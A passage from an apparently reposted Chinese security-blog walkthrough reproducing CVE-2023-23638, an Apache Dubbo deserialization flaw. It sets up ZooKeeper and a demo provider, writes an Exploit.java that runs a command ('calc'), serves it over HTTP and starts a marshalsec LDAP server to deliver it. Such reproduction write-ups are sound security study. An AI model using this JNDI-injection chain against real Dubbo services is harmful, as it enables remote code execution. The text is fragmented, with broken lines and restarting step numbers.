https:
/
/archive.apache.org/dist
/zookeeper/zookeeper
-
3.3
.
3
/zookeeper-
3.3
.
3
.tar.gz
解压后的根目录下新建data和logs两个文件夹,修改conf目录下的zoo_sample.cfg为zoo.cfg,覆盖原有的dataDir并添加dataLogDir
2、双击bin目录下的zkServer.cmd,启动zookeeper
3、下载测试Demo及POC:
https://github.com/lz2y/DubboPOC
4、启动Provider
git clone https:
//github.com/mbechler/marshalsec
mvn clean
package
–DskipTests
2、创建Exploit.java文件
public
class
Exploit
{
static
{
System.err.println(
"Pwned"
);
try
{
String cmds =
"calc"
;
Runtime.getRuntime().exec(cmds);
}
catch
(
Exception
e ) {
e.printStackTrace();
}
}
}
javac 得到Exploit.class
3、在Exploit.class目录下开启http服务
python
-m
http
.server
8000
4、使用marshalsec开启JNDI服务
java
-cp marshalsec-0.0.3-SNAPSHOT-
all
.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:8000/#Exploit"
8087
5、打开
srcmainjavatoplz2yvulCVE202130179.java
修改接口名及其方法,替换ldap uri 填写Dubbo服务的ip以及端口号
原文始发于微信公众号(Timeline Sec):CVE-2023-23638:Apache Dubbo JavaNative反序列化漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论